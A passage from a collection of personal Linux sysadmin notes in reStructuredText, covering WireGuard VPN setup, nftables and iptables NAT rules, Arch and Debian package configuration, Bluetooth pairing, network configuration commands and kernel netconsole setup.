code-block:: sh 46 | 47 | (umask 277 && wg genpsk > /etc/wireguard/psk) 48 | 49 | In order to configure an interface for the server: 50 | 51 | .. code-block:: sh 52 | 53 | ip link add dev wg0 type wireguard 54 | ip addr add 10.0.0.1/32 dev wg0 55 | ip addr add fd12:3456:789a::1/128 dev wg0 56 | wg set wg0 listen-port 51820 private-key /etc/wireguard/privatekey 57 | wg set wg0 peer ${CLIENT_PUBKEY} persistent-keepalive 25 \ 58 | preshared-key /etc/wireguard/psk \ 59 | allowed-ips 10.0.0.2/32,fd12:3456:789a::2/128 60 | ip link set wg0 up 61 | 62 | # Save the configuration 63 | (umask 077 && wg showconf wg0 > /etc/wireguard/wg0.conf) 64 | 65 | # In order to restore the configuration: 66 | wg setconf wg0 /etc/wireguard/wg0.conf 67 | 68 | The configuration file for interface ``wg0``, ``/etc/wireguard/wg0.conf``, can also be directly written like this: 69 | 70 | .. code-block:: ini 71 | 72 | [Interface] 73 | Address = 10.0.0.1/32, fd12:3456:789a::1/128 74 | ListenPort = 51820 75 | PrivateKey = 76 | SaveConfig = true 77 | 78 | [Peer] 79 | PublicKey = 80 | PresharedKey = 81 | AllowedIPs = 10.0.0.2/32,fd12:3456:789a::2/128 82 | PersistentKeepalive = 25 83 | 84 | On the client, the configuration is similar, and the server is configured with an additional ``endpoint`` parameter: 85 | 86 | .. code-block:: sh 87 | 88 | wg set wg0 peer ${SERVER_PUBKEY} persistent-keepalive 25 \ 89 | allowed-ips 10.0.0.1/32 endpoint ${SERVER_ADDR}:51820 90 | # In the configuration file: Endpoint = ${SERVER_ADDR}:51820 91 | 92 | If the VPN endpoint is allowed to route packets to the external network interface ``eth0``, this firewall configuration needs to be applied on the server: 93 | 94 | .. code-block:: sh 95 | 96 | iptables -A FORWARD -i wg0 -o eth0 -j ACCEPT 97 | iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 98 | ip6tables -A FORWARD -i wg0 -o eth0 -j ACCEPT 99 | ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 100 | 101 | Then, in order to start WireGuard, run as ``root``: 102 | 103 | .. code-block:: sh 104 | 105 | wg-quick up wg0 106 | systemctl enable wg-quick@wg0 107 | 108 | # To shut down an interface: 109 | wg-quick down wg0 110 | 111 | To display WireGuard status: 112 | 113 | .. code-block:: sh 114 | 115 | wg 116 | wg show 117 | 118 | 119 | Disabling NetworkManager 120 | ------------------------ 121 | 122 | In order to disable NetworkManager for the interface, write into ``/etc/NetworkManager/conf.d/unmanaged.conf``: 123 | 124 | .. code-block:: ini 125 | 126 | [keyfile] 127 | unmanaged-devices=interface-name:wg0 128 | 129 | 130 | Listening on a DNS port used by a DNS server 131 | -------------------------------------------- 132 | 133 | WireGuard listens on all available IP addresses (and it is designed like this according to https://lists.zx2c4.com/pipermail/wireguard/2019-March/003938.html). 134 | If another service is bound to the loopback on the port configured by WireGuard, starting interface ``wg0`` fails, with the following kernel logs: 135 | 136 | wireguard: wg0: Could not create IPv4 socket 137 | A link change request failed with some changes committed already. 138 | Interface wg0 may have been left with an inconsistent configuration, please check. 139 | 140 | This occurs for example when trying to listen to 192.0.2.42:53 (UDP) while a DNS resolver is running on 127.0.0.1:53. 141 | A possible workaround can use a firewall to solve this issue: 142 | 143 | * Configure WireGuard to listen on another port (eg. UDP 5353, which is used for multicast DNS) 144 | * Redirect port 53 to 5353 for incoming traffic: 145 | 146 | .. code-block:: sh 147 | 148 | # Allow incoming connections 149 | nft add rule inet filter input 'udp dport {53, 5353} counter accept comment "accept WireGuard on DNS ports"' 150 | nft add rule inet filter output 'udp sport {53, 5353} counter accept comment "accept WireGuard on DNS ports"' 151 | 152 | # Load NAT module 153 | nft add table nat 154 | nft add chain nat prerouting '{ type nat hook prerouting priority 0 ; }' 155 | nft add chain nat postrouting '{ type nat hook postrouting priority 100 ; }' 156 | 157 | # Redirect module has been available since Linux Kernel 3.19. 158 | nft add rule nat prerouting ip daddr 192.0.2.42 udp dport 53 counter redirect to 5353 159 | 160 | * Here is an example configuration file for nftables firewall: 161 | 162 | .. code-block:: text 163 | 164 | table inet filter { 165 | chain input { 166 | type filter hook input priority 0; policy accept; 167 | # ... 168 | udp dport 53 counter accept comment "accept WireGuard on DNS port" 169 | udp dport 5353 counter accept comment "accept WireGuard on mDNS port" 170 | # ... 171 | } 172 | chain output { 173 | type filter hook output priority 0; policy accept; 174 | # ... 175 | udp sport 53 counter accept comment "accept WireGuard on DNS port" 176 | udp sport 5353 counter accept comment "accept WireGuard on mDNS port" 177 | } 178 | } 179 | table nat { 180 | chain prerouting { 181 | type nat hook prerouting priority 0; policy accept; 182 | ip daddr 192.0.2.42 udp dport 53 counter redirect to 5353 comment "WireGuard redirect" 183 | } 184 | chain postrouting { 185 | type nat hook postrouting priority 100; policy accept; 186 | } 187 | } 188 | -------------------------------------------------------------------------------- /index.rst: -------------------------------------------------------------------------------- 1 | .. Sphinx index file 2 | 3 | Generic Configuration 4 | ===================== 5 | 6 | If it's the first time you come here, you may want to read the 7 | :doc:`README` before continuing. 8 | 9 | Contents: 10 | 11 | .. toctree:: 12 | :maxdepth: 2 13 | 14 | sysadmin/index 15 | database/index 16 | etc/index 17 | etc-desktop/index 18 | etc-server/index 19 | www/index 20 | windows/index 21 | README 22 | 23 | Github link: https://github.com/fishilico/generic-config 24 | -------------------------------------------------------------------------------- /sysadmin/archlinux-pkg.rst: -------------------------------------------------------------------------------- 1 | Notes about Arch Linux packages 2 | =============================== 3 | 4 | Here are some notes about Arch Linux packages. 5 | 6 | Building packages 7 | ----------------- 8 | 9 | Arch Linux packages can be found in two main places: official repositories and 10 | Arch User Repository (AUR). Official repositories are managed throw the Arch 11 | Build System (ABS). Users interact with them thanks to ``pacman``. AUR is 12 | managed by users and only contain sources, not binary packages. 13 | 14 | To build a package, you need to install ``base-devel`` and use ``makepkg``. 15 | The main component of a package is the ``PKGBUILD`` description file, which 16 | describes where to download sources and how to compile binary files. Once you 17 | have a ``PKGBUILD`` (and additional files such as patches) in a directory, 18 | to build and install the package you just need to issue:: 19 | 20 | makepkg -si 21 | 22 | ``-s`` option means *install missing dependencies using pacman*. 23 | ``-i`` option means *install the package after it is built*. 24 | 25 | You should customize your ``/etc/makepkg.conf`` file before launching the build, 26 | for example to set up the packager name: 27 | 28 | .. code-block:: sh 29 | 30 | PACKAGER="Myself " 31 | 32 | It is also possible to enable parallel build and to use a temporary build directory 33 | 34 | .. code-block:: sh 35 | 36 | cat >> /etc/makepkg.conf << EOF 37 | MAKEFLAGS="-j4" # According to $(nproc) 38 | BUILDDIR=/tmp/makepkg 39 | EOF 40 | cat >> /etc/fstab << EOF 41 | makepkg /tmp/makepkg tmpfs defaults,auto,nodev,nosuid,exec,gid=100,uid=1000,mode=0700 0 0 42 | EOF 43 | 44 | For more information read the wiki! Here are some links: 45 | 46 | - https://wiki.archlinux.org/index.php/Arch_Build_System 47 | - https://wiki.archlinux.org/index.php/AUR 48 | - https://wiki.archlinux.org/index.php/makepkg 49 | - https://wiki.archlinux.org/index.php/Official_Repositories 50 | - https://wiki.archlinux.org/index.php/Pacman_Tips 51 | - https://wiki.archlinux.org/index.php/PKGBUILD 52 | - https://wiki.archlinux.org/index.php/Yaourt 53 | 54 | 55 | Yaourt, pacaur and trizen 56 | ------------------------- 57 | 58 | ``yaourt`` (Yet AnOther User Repository Tool), ``pacaur`` and ``trizen`` ease the 59 | installation of packages from the AUR. Their interfaces are similar to 60 | ``pacman`` but they can download, build and install user packages too, wrapping 61 | both ``makepkg`` and ``pacman``. 62 | 63 | ``yaourt`` includes ``-G`` option (``--getpkgbuild``) to get a ``PKGBUILD`` file 64 | for a specified package. 65 | 66 | ``pacaur`` main advantage lies in keeping the downloaded PKGBUILD and their git 67 | history in a directory, ``$HOME/.cache/pacaur/``, which allows tracking changes 68 | when upgrading AUR packages. 69 | 70 | ``trizen`` is a more recent one and can replace ``pacaur``. 71 | 72 | 73 | Debug build 74 | ----------- 75 | 76 | To build packages with debug symbols, you need to change ``OPTIONS`` variable 77 | in ``/etc/makepkg.conf``. Here is the default configuration:: 78 | 79 | OPTIONS=(strip docs !libtool !staticlibs emptydirs zipman purge !upx !debug) 80 | 81 | You just need to add and remove some bangs following your needs:: 82 | 83 | OPTIONS=(!strip docs !libtool !staticlibs emptydirs zipman purge !upx debug) 84 | -------------------------------------------------------------------------------- /sysadmin/bluetooth.rst: -------------------------------------------------------------------------------- 1 | Bluetooth on Linux 2 | ================== 3 | 4 | Introduction 5 | ------------ 6 | 7 | Bluetooth is a protocol that can be used to communicate between two devices that are paired together. 8 | It can be used to connect wireless devices (keyboard, mouse, sound speaker, etc.), to transmit files (with OBEX, for Object Exchange) and even to share Internet connectivity (using BNEP, the Bluetooth Network Encapsulation Protocol, which uses a L2CAP channel to transmit IP packets). 9 | The protocol has been developed since at least 1989 and Bluetooth has been standardised as IEEE 802.15.1. 10 | It operates in UHF radio waves, between 2.400 and 2.485 GHz. 11 | More information can be found on its Wikipedia page: https://en.wikipedia.org/wiki/Bluetooth 12 | 13 | On Linux, several steps need to be performed in order to use Bluetooth: 14 | 15 | * Install the packages that provide Bluetooth service and programs: ``bluez`` and ``bluez-utils`` 16 | * Unblock the radio interface, if it has been blocked: 17 | 18 | .. code-block:: sh 19 | 20 | rfkill unblock bluetooth 21 | 22 | * Start the service: 23 | 24 | .. code-block:: sh 25 | 26 | systemctl start bluetooth.service 27 | 28 | * Start a ``bluetoothctl`` CLI and power the device on by issuing ``power on``. 29 | 30 | It is possible to record the Bluetooth communications using the monitor, ``btmon -w file.bt``. 31 | This command produces BTSnoop files that can be opened for example in Wireshark. 32 | 33 | 34 | Connecting an Android phone to a laptop using Bluetooth 35 | ------------------------------------------------------- 36 | 37 | Here is a trace on a laptop that get paired with an Android phone via Bluetooth (``[bluetooth]#`` is the user prompt): 38 | 39 | .. code-block:: sh 40 | 41 | $ bluetoothctl 42 | [CHG] Controller 01:23:45:67:89:AB Pairable: yes 43 | 44 | [bluetooth]# power on 45 | [CHG] Controller 01:23:45:67:89:AB Class: 0x0000010c 46 | Changing power on succeeded 47 | [CHG] Controller 01:23:45:67:89:AB Powered: yes 48 | 49 | [bluetooth]# scan on 50 | [NEW] Device 55:44:33:22:11:00 AndroidPhone 51 | 52 | [bluetooth]# devices 53 | Device 55:44:33:22:11:00 AndroidPhone 54 | 55 | [bluetooth]# pair 55:44:33:22:11:00 56 | Attempting to pair with 55:44:33:22:11:00 57 | [CHG] Device 55:44:33:22:11:00 Connected: yes 58 | Request confirmation 59 | [agent] Confirm passkey 123123 (yes/no): yes 60 | [CHG] Device 55:44:33:22:11:00 Modalias: bluetooth:v0075p0100d0201 61 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001105-0000-1000-8000-00805f9b34fb 62 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb 63 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb 64 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb 65 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001112-0000-1000-8000-00805f9b34fb 66 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001115-0000-1000-8000-00805f9b34fb 67 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001116-0000-1000-8000-00805f9b34fb 68 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000111f-0000-1000-8000-00805f9b34fb 69 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000112d-0000-1000-8000-00805f9b34fb 70 | [CHG] Device 55:44:33:22:11:00 UUIDs: 0000112f-0000-1000-8000-00805f9b34fb 71 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001132-0000-1000-8000-00805f9b34fb 72 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001200-0000-1000-8000-00805f9b34fb 73 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001800-0000-1000-8000-00805f9b34fb 74 | [CHG] Device 55:44:33:22:11:00 UUIDs: 00001801-0000-1000-8000-00805f9b34fb 75 | [CHG] Device 55:44:33:22:11:00 UUIDs: a23d00bc-217c-123b-9c00-fc44577136ee 76 | [CHG] Device 55:44:33:22:11:00 ServicesResolved: yes 77 | [CHG] Device 55:44:33:22:11:00 Paired: yes 78 | Pairing successful 79 | [CHG] Device 55:44:33:22:11:00 ServicesResolved: no 80 | [CHG] Device 55:44:33:22:11:00 Connected: no 81 | 82 | [bluetooth]# info 55:44:33:22:11:00 83 | Device 55:44:33:22:11:00 (public) 84 | Name: AndroidPhone 85 | Alias: AndroidPhone 86 | Class: 0x005a020c 87 | Icon: phone 88 | Paired: yes 89 | Trusted: no 90 | Blocked: no 91 | Connected: no 92 | LegacyPairing: no 93 | UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b34fb) 94 | UUID: Audio Source (0000110a-0000-1000-8000-00805f9b34fb) 95 | UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b34fb) 96 | UUID: A/V Remote Control (0000110e-0000-1000-8000-00805f9b34fb) 97 | UUID: Headset AG (00001112-0000-1000-8000-00805f9b34fb) 98 | UUID: PANU (00001115-0000-1000-8000-00805f9b34fb) 99 | UUID: NAP (00001116-0000-1000-8000-00805f9b34fb) 100 | UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b34fb) 101 | UUID: SIM Access (0000112d-0000-1000-8000-00805f9b34fb) 102 | UUID: Phonebook Access Server (0000112f-0000-1000-8000-00805f9b34fb) 103 | UUID: Message Access Server (00001132-0000-1000-8000-00805f9b34fb) 104 | UUID: PnP Information (00001200-0000-1000-8000-00805f9b34fb) 105 | UUID: Generic Access Profile (00001800-0000-1000-8000-00805f9b34fb) 106 | UUID: Generic Attribute Profile (00001801-0000-1000-8000-00805f9b34fb) 107 | UUID: Vendor specific (a23d00bc-217c-123b-9c00-fc44577136ee) 108 | Modalias: bluetooth:v0075p0100d0201 109 | 110 | The information about the peering (for example encryption and signature keys for messages) can be extracted from ``/var/lib/bluetooth/01:23:45:67:89:AB/55:44:33:22:11:00/info``. 111 | 112 | When using NetworkManager, a Bluetooth interface can be configured in order to use the phone Internet connection wirelessly. 113 | This produces a BNEP interface (Bluetooth Network Encapsulation Protocol) named for example ``bnep0``, where a DHCP client can be used in order to get the IPv4 network configuration. 114 | This can cause the following message to appear in ``bluetoothctl``:: 115 | 116 | Authorize service 117 | [agent] Authorize service 0000000f-0000-1000-8000-00805f9b34fb (yes/no): yes 118 | [AndroidPhone]# 119 | 120 | This UUID matches the BNEP service and is needed in order to exchange data. 121 | Such an UUID can be searched in bluez header files such as https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/uuid.h?h=5.51 122 | -------------------------------------------------------------------------------- /sysadmin/debian.rst: -------------------------------------------------------------------------------- 1 | Some information of Debian systems 2 | ================================== 3 | 4 | This document describes some configuration customizations and other sysadmin 5 | tasks I do when I set up a Debian host. 6 | 7 | 8 | Debian post-installation commands 9 | --------------------------------- 10 | 11 | ``dpkg-reconfigure locales`` 12 | Reconfigure locales, for example to ``en_US en_US.UTF-8 fr_FR.UTF-8 fr_FR@euro``. 13 | Keep in mind SSH preserve locale across the connection so a single UTF-8 14 | locale is not enough. 15 | 16 | ``dpkg-reconfigure console-data && dpkg-reconfigure keyboard-configuration`` 17 | Change which keyboard configuration to use. ``loadkeys`` can also be used, 18 | with keymaps in ``/usr/share/kbd/keymaps``. 19 | After this: ``service keyboard-setup restart``. 20 | 21 | ``cd /usr/bin && sudo ln -s python python2`` 22 | For scripts which require python2 command. 23 | 24 | ``update-rc.d $SERVICE remove`` or ``sysv-rc-conf`` 25 | Remove some unneeded services from boot. Opposite operation is ``defaults``. 26 | 27 | Enable persistent iptables configuration: 28 | 29 | .. code-block:: sh 30 | 31 | apt-get install iptables-persistent 32 | systemctl enable netfilter-persistent.service 33 | 34 | Or persistent nftables configuration: 35 | 36 | .. code-block:: sh 37 | 38 | systemctl enable nftables.service 39 | 40 | 41 | APT configuration 42 | ----------------- 43 | 44 | This configuration doesn't install recommended packages by default. 45 | 46 | ``/etc/apt/apt.conf``:: 47 | 48 | APT::Install-Recommends "0"; 49 | APT::Install-Suggests "0"; 50 | 51 | To configure an HTTP proxy, you need to add one more line:: 52 | 53 | Acquire::http::Proxy "http://proxy.example.com:8080/"; 54 | 55 | ``/etc/apt/sources.list`` file depends on your location:: 56 | 57 | # Here is this file for a Debian Unstable in the US. 58 | deb http://http.us.debian.org/debian/ sid main contrib non-free 59 | deb-src http://http.us.debian.org/debian/ sid main contrib non-free 60 | 61 | # And here for a Debian Squeeze server in Germany 62 | deb http://ftp.de.debian.org/debian squeeze main contrib non-free 63 | deb http://ftp.de.debian.org/debian-security squeeze/updates main contrib non-free 64 | 65 | You may install ``debsums`` package to check the integrity of the installed 66 | files. There is a cron job with ``debsums`` which is configured by 67 | ``/etc/default/debsums``:: 68 | 69 | # Set this to never to disable the checksum verification or 70 | # one of "daily", "weekly", "monthly" to enable it 71 | CRON_CHECK=never 72 | 73 | Apticron is a program which automatically downloads the new updates (without 74 | installing them) and send mails about them. By default, it is configured to run 75 | every day. To change this to a weekly-based period, you need to edit 76 | ``/etc/cron.d/apticron``:: 77 | 78 | # Sunday, 0:41 79 | 41 0 * * 0 root if test -x /usr/sbin/apticron; then /usr/sbin/apticron --cron; else true; fi 80 | 81 | 82 | Apache commands 83 | --------------- 84 | 85 | ``a2dismod status`` 86 | Disable the status module. 87 | 88 | ``a2dissite default`` 89 | Disable the default site, you need to write your own site file and enable it. 90 | 91 | 92 | Postfix configuration 93 | --------------------- 94 | 95 | To send system messages by email, it is a good idea to have a mail server on an 96 | host which is configured as an "Internet Site". On a Debian host Postfix seems 97 | to be a good choice and is easy to install, configure and manage. 98 | 99 | Reload aliases after any change in ``/etc/aliases``:: 100 | 101 | postaliases /etc/aliases || newaliases 102 | postfix reload 103 | 104 | ``/etc/aliases`` example:: 105 | 106 | root: root@example.com 107 | postmaster: root 108 | abuse: root 109 | user: root 110 | web: web@example.com 111 | www: web 112 | 113 | The name of the mail system is written down in ``/etc/mailname``. 114 | -------------------------------------------------------------------------------- /sysadmin/index.rst: -------------------------------------------------------------------------------- 1 | Some notes and tips&tricks about system administration 2 | ====================================================== 3 | 4 | .. toctree:: 5 | :maxdepth: 2 6 | :glob: 7 | 8 | * 9 | -------------------------------------------------------------------------------- /sysadmin/nat.rst: -------------------------------------------------------------------------------- 1 | Linux NAT router 2 | ================ 3 | 4 | This document presents some commands to configure a Linux NAT router in an IPv4 5 | network. *NAT* means Network Address Translation and has been designed to 6 | provide Internet connectivity when there is only a limited number of addresses 7 | assigned to a network. 8 | 9 | Network architecture 10 | -------------------- 11 | 12 | For the sake of clarity, this document uses following interface names and 13 | network addresses:: 14 | 15 | +--------------------------------+ 16 | | Linux | Private Network 17 | Internet ------| eth0 Router eth1 |----- (Wifi, VPN...) 18 | | 192.0.2.42 10.13.37.1 | 10.13.37.0/24 19 | +--------------------------------+ | 20 | | 21 | +---------+ 22 | | Private | 23 | | Host | 24 | +---------+ 25 | 26 | Hosts connected to the private network don't have public IPv4 addresses and are 27 | configured to connect to the Internet via a router sitting at ``10.13.37.1``. 28 | 29 | To configure the router so that the private host gets access to the Internet, 30 | you need to issue following commands on the Linux router: 31 | 32 | * Configure the firewall to do NAT:: 33 | 34 | # If the public address (192.0.2.42) is static, use this command 35 | iptables -t nat -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j SNAT --to-source 192.0.2.42 36 | 37 | # Otherwise if the public address is dynamic, use this command 38 | iptables -t nat -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j MASQUERADE 39 | 40 | * Configure the firewall to allow packet forwarding:: 41 | 42 | iptables -A FORWARD -s 10.13.37.0/24 -i eth1 -o eth0 -j ACCEPT 43 | iptables -A FORWARD -d 10.13.37.0/24 -i eth0 -o eth1 -j ACCEPT 44 | 45 | * Enable packet forwarding via sysctl (``sysctl -w`` writes to ``/proc/sys/...``):: 46 | 47 | sysctl -w net.ipv4.conf.eth0.forwarding=1 48 | sysctl -w net.ipv4.conf.eth1.forwarding=1 49 | 50 | # Previous entries may not exists in old kernels. In such case, use: 51 | # sysctl -w net.ipv4.ip_forward=1 52 | # ... which acts like: sysctl -w net.ipv4.conf.all.forwarding=1 53 | 54 | 55 | Persistent configuration 56 | ------------------------ 57 | 58 | You may create following files to write your configuration in a way it is kept 59 | across rebooting. 60 | 61 | ``/etc/iptables/iptables.rules`` (please adapt this path according to your Linux 62 | distribution):: 63 | 64 | *filter 65 | :INPUT DROP [0:0] 66 | :FORWARD DROP [0:0] 67 | :OUTPUT DROP [0:0] 68 | # (... INPUT and OUTPUT filters ...) 69 | -A FORWARD -s 10.13.37.0/24 -i eth1 -o eth0 -j ACCEPT 70 | -A FORWARD -d 10.13.37.0/24 -i eth0 -o eth1 -j ACCEPT 71 | COMMIT 72 | 73 | *nat 74 | :PREROUTING ACCEPT [0:0] 75 | :POSTROUTING ACCEPT [0:0] 76 | :OUTPUT ACCEPT [0:0] 77 | -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j SNAT --to-source 192.0.2.42 78 | COMMIT 79 | 80 | 81 | ``/etc/sysctl.d/ip_forward.conf`` (or ``/etc/sysctl.conf`` on old systems):: 82 | 83 | net.ipv4.conf.eth0.forwarding=1 84 | net.ipv4.conf.eth1.forwarding=1 85 | -------------------------------------------------------------------------------- /sysadmin/netconfig.rst: -------------------------------------------------------------------------------- 1 | Network configuration 2 | ===================== 3 | 4 | This short document is a quick reference to some commands you would like to 5 | know when you're connecting to a network and asking "What's the conf, here?" 6 | If there is a kind of "automatic configuration" taking place, you may want to 7 | know what information the network is giving you. In the other case, you need to 8 | know how to set up a manual configuration by hand. 9 | 10 | 11 | IPv4 configuration 12 | ------------------ 13 | Automatic IPv4 configuration is quite straightforward: run a DHCP client! For 14 | example, to discover a DHCP server on ``eth0`` interface:: 15 | 16 | dhclient eth0 17 | # or 18 | dhcpcd eth0 19 | 20 | Static IPv4 configuration can be achieved thanks to ``ip`` command:: 21 | 22 | ip addr add 192.168.0.42/24 dev eth0 23 | ip route add default via 192.168.0.1 dev eth0 24 | 25 | This presupposes that you know what IP address your gateway uses. Without this 26 | knowledge, you need to sniff and/or scan the network to find it. 27 | 28 | 29 | IPv6 configuration 30 | ------------------ 31 | Automatic IPv6 configuration is more straightforward than IPv4: it is done by 32 | the kernel and you have nothing to do! Sometimes you may want to ignore the 33 | automatic configuration. This command disables it on ``eth0``:: 34 | 35 | sysctl -w sys.net.ipv6.conf.accept_ra=0 36 | 37 | Automatic configuration works because when a host sends a Router Solicitation 38 | message (ICMPv6 type 133), the gateways answer with a Router Advertisement 39 | (ICMPv6 type 134) containing information similar to DHCP. To send a RS by hand, 40 | install ``ndisc6`` package and run:: 41 | 42 | rdisc6 eth0 43 | 44 | Like with IPv4, static IPv6 can be configured with ``ip`` command:: 45 | 46 | ip addr add 2001:db8::42/64 dev eth0 47 | ip -6 route add default via 2001:db8::1 dev eth0 48 | 49 | However, unlike IPv4, there is a smart way to find the gateway: multicast. More 50 | precisely, IPv6 defines ``ff02::2`` as being a multicast address for all 51 | routers on a link (a Linux machine answers as a router when 52 | ``sys.net.ipv6.conf.forwarding`` is 1). If your gateway answers to ping request, 53 | you can run this command to get its IPv6 address:: 54 | 55 | ping6 -c1 ff02::2%eth0 56 | 57 | The result would look like:: 58 | 59 | PING ff02::2%eth0(ff02::2) 56 data bytes 60 | 64 bytes from fe80::4242:42ff:fe42:4242: icmp_seq=1 ttl=64 time=0.420 ms 61 | 62 | In such case, you may configure your default route with this link-local address 63 | (in ``fe80::/64``):: 64 | 65 | ip -6 route add default via fe80::4242:42ff:fe42:4242 dev eth0 66 | 67 | 68 | DNS configuration 69 | ----------------- 70 | In automatic configurations, the IP addresses of the local DNS servers and the 71 | search domains are found in DHCP headers and RA options. If you use a software 72 | like NetworkManager or resolvconf or wicd, this information is directly written 73 | in ``/etc/resolv.conf``. 74 | 75 | In manual configuration, edit this file with lines like these:: 76 | 77 | # resolver1.opendns.com and resolver2.opendns.com 78 | nameserver 208.67.222.222 79 | nameserver 208.67.220.220 80 | domain example.com 81 | search example.com 82 | 83 | 84 | Systemd network configuration 85 | ----------------------------- 86 | On a server which provides an ens42 wired connection with a static IP 87 | configuration, it is possible to use systemd-networkd with the following 88 | configuration in ``/etc/systemd/network/wired.network``:: 89 | 90 | [Match] 91 | Name=ens42 92 | 93 | [Network] 94 | Address=192.168.0.42/24 95 | Gateway=192.168.0.1 96 | 97 | 98 | Broadcast ping 99 | -------------- 100 | To discover pingable hosts on your network, send an Echo Request (ping) to 101 | every host. In IPv4 this broadcasts an ICMP type 8 message:: 102 | 103 | ping -b 255.255.255.255 -I eth0 104 | 105 | In IPv6 this multicasts an ICMPv6 type 128 message to all nodes:: 106 | 107 | ping6 ff02::1%eth0 108 | 109 | After such command, you may list every link-layer addresses of your neighbors by 110 | issuing:: 111 | 112 | ip neigh show 113 | 114 | 115 | Link-layer ping 116 | --------------- 117 | When the network don't give your host an IP address, you need to find an unused 118 | one. In IPv4 you can test whether an IP address is free or used by sending ARP 119 | requests (what doesn't require an IPv4 address to be configured, unlike 120 | ``ping``):: 121 | 122 | arping 192.168.0.42 -I eth0 123 | 124 | In IPv6, ARP requests are replaced with Neighbor Solicitation (ICMPv6 type 135 125 | messages):: 126 | 127 | ndisc6 2001:db8::42 eth0 128 | -------------------------------------------------------------------------------- /sysadmin/netconsole.rst: -------------------------------------------------------------------------------- 1 | Kernel Network Console (netconsole module) 2 | ========================================== 3 | 4 | To debug hosts when a display is not available, or in other circumstances, it's 5 | possible to set up a network console so that kernel messages go through the 6 | network to a destination host which can display these messages. Let's say the 7 | source host (which sends messages) has an ethernet interface ``eth0`` which is 8 | linked to the destination host (which receives messages). 9 | The addresses of each interface is as follows: 10 | 11 | +-------------+-----------------------+-------------------------------+------+ 12 | | Host | MAC address | Link-local IPv6 address | Port | 13 | +=============+=======================+===============================+======+ 14 | | Source | ``00:00:00:00:00:01`` | ``fe80::0200:00ff:fe00:0001`` | 6665 | 15 | +-------------+-----------------------+-------------------------------+------+ 16 | | Destination | ``00:00:00:00:00:02`` | ``fe80::0200:00ff:fe00:0002`` | 6666 | 17 | +-------------+-----------------------+-------------------------------+------+ 18 | 19 | The configuration of netconsole module is documented like this:: 20 | 21 | netconsole=[src-port]@[src-ip]/[],[tgt-port]@/[tgt-macaddr] 22 | 23 | where: 24 | 25 | * ``src-port`` source for UDP packets (defaults to 6665) 26 | * ``src-ip`` source IP to use (interface address) 27 | * ``dev network`` interface (eth0) 28 | * ``tgt-port`` port for logging agent (6666) 29 | * ``tgt-ip`` IP address for logging agent 30 | * ``tgt-macaddr`` ethernet MAC address for logging agent (broadcast) 31 | 32 | Hence in the previous scenario, the configuration line is:: 33 | 34 | netconsole=6665@fe80::0200:00ff:fe00:0001/eth0,6666@fe80::0200:00ff:fe00:0002/00:00:00:00:00:02 35 | 36 | This line can be set as-is either on boot:: 37 | 38 | linux loglevel=5 netconsole=... 39 | 40 | or when loading the module:: 41 | 42 | modprobe netconsole netconsole=... 43 | 44 | Once the source host is configured, you would normally set up something which 45 | is listening for incoming messages on the destination host. For example with 46 | ``socat`` by doing so:: 47 | 48 | socat UDP6-RECV:6666 - 49 | 50 | To test the communication between the 2 hosts, you may send a raw UDP packet:: 51 | 52 | echo test | socat - 'UDP6:[fe80::0200:00ff:fe00:0002]:6666,sourceport=6665' 53 | 54 | and if this worked, trigger a kernel message on the source host:: 55 | 56 | echo h > /proc/sysrq-trigger 57 | 58 | 59 | Dynamic configuration 60 | --------------------- 61 | 62 | To dynamically change netconsole's settings, you need to mount the kernel 63 | config filesystem:: 64 | 65 | modprobe configfs 66 | mount none -t configfs /sys/kernel/config 67 | # /sys/kernel/config/netconsole would exist if netconsole module is loaded 68 | mkdir /sys/kernel/config/netconsole/target 69 | 70 | Now, ``/sys/kernel/config/netconsole/target`` would contain some files. 71 | To configure this new netconsole target, you need to write the values to each 72 | file before writing 1 to ``enabled``:: 73 | 74 | cd /sys/kernel/config/netconsole/target 75 | echo eth0 > dev_name 76 | echo fe80::0200:00ff:fe00:0001 > local_ip 77 | echo 6665 > local_port 78 | echo fe80::0200:00ff:fe00:0002 > remote_ip 79 | echo 00:00:00:00:00:02 > remote_mac 80 | echo 6666 > remote_port 81 | echo 1 > enabled 82 | 83 | 84 | Firewall configuration 85 | ---------------------- 86 | 87 | Here are the iptables rules to add to the firewall to accept the communication. 88 | 89 | Source host:: 90 | 91 | iptables -A OUTPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT 92 | ip6tables -A OUTPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT 93 | 94 | Destination host:: 95 | 96 | # You would add some specific filtering: 97 | # * by interface: -i eth0 98 | # * by MAC address: -m mac --mac-source 00:00:00:00:00:01 99 | # * by source IP address: -s fe80::0200:00ff:fe00:0001 100 | iptables -A INPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT 101 | ip6tables -A INPUT -p udp -m udp --sport 6665 --dport 6666 -j ACCEPT 102 | 103 | 104 | Documentation links 105 | ------------------- 106 | 107 | * https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/Documentation/networking/netconsole.txt 108 | Linux Documentation 109 | * https://wiki.archlinux.org/index.php/Netconsole 110 | ArchLinux wiki 111 | * https://wiki.ubuntu.com/Kernel/Netconsole 112 | Ubuntu wiki 113 | -------------------------------------------------------------------------------- /sysadmin/perf-linux.rst: -------------------------------------------------------------------------------- 1 | Using perf on Linux 2 | =================== 3 | 4 | Introduction 